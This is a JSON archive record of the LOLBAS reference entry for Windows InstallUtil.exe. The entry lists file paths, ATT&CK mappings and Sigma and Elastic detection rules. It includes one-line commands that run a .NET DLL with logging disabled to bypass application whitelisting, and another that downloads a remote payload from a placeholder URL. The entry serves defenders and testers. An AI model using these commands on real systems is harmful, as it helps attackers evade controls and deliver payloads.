{ "id": "0ed27889-e66d-4c71-9cb0-9501a843aafb", "created_at": "2026-04-06T00:15:59.22645Z", "updated_at": "2026-04-10T03:21:55.975939Z", "deleted_at": null, "sha1_hash": "a5f9efa647a83b2f91a8a34b194f4b96269a214a", "title": "Installutil on LOLBAS", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 53520, "plain_text": "Installutil on LOLBAS\r\nArchived: 2026-04-05 20:30:42 UTC\r\nThe Installer tool is a command-line utility that allows you to install and uninstall server resources by executing\r\nthe installer components in specified assemblies\r\nPaths:\r\nC:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe\r\nC:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe\r\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe\r\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe\r\nResources:\r\nhttps://pentestlab.blog/2017/05/08/applocker-bypass-installutil/\r\nhttps://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12\r\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md\r\nhttps://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/\r\nhttps://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/\r\nhttps://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool\r\nAcknowledgements:\r\nCasey Smith (@subtee)\r\nNir Chako (Pentera) (@C_h4ck_0)\r\nDetections:\r\nSigma: proc_creation_win_instalutil_no_log_execution.yml\r\nSigma: proc_creation_win_lolbin_installutil_download.yml\r\nElastic: defense_evasion_installutil_beacon.toml\r\nElastic: defense_evasion_network_connection_from_windows_binary.toml\r\nAWL bypass\r\n1. Execute the target .NET DLL or EXE.\r\nInstallUtil.exe /logfile= /LogToConsole=false /U file.dll\r\nUse case\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Installutil/\r\nPage 1 of 3\n\nUse to execute code and bypass application whitelisting\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1218.004: InstallUtil\r\nTags\r\nExecute: DLL (.NET)\r\nExecute: EXE (.NET)\r\nExecute\r\n1. Execute the target .NET DLL or EXE.\r\nInstallUtil.exe /logfile= /LogToConsole=false /U file.dll\r\nUse case\r\nUse to execute code and bypass application whitelisting\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1218.004: InstallUtil\r\nTags\r\nExecute: DLL (.NET)\r\nExecute: EXE (.NET)\r\nDownload\r\n1. It will download a remote payload and place it in INetCache.\r\nInstallUtil.exe https://www.example.org/file.ext\r\nUse case\r\nDownloads payload from remote server\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Installutil/\r\nPage 2 of 3\n\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1105: Ingress Tool Transfer\r\nTags\r\nDownload: INetCache\r\nSource: https://lolbas-project.github.io/lolbas/Binaries/Installutil/\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Installutil/\r\nPage 3 of 3", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://lolbas-project.github.io/lolbas/Binaries/Installutil/" ], "report_names": [ "Installutil" ], "threat_actors": [], "ts_created_at": 1775434559, "ts_updated_at": 1775791315, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/a5f9efa647a83b2f91a8a34b194f4b96269a214a.pdf", "text": "https://archive.orkl.eu/a5f9efa647a83b2f91a8a34b194f4b96269a214a.txt", "img": "https://archive.orkl.eu/a5f9efa647a83b2f91a8a34b194f4b96269a214a.jpg" } }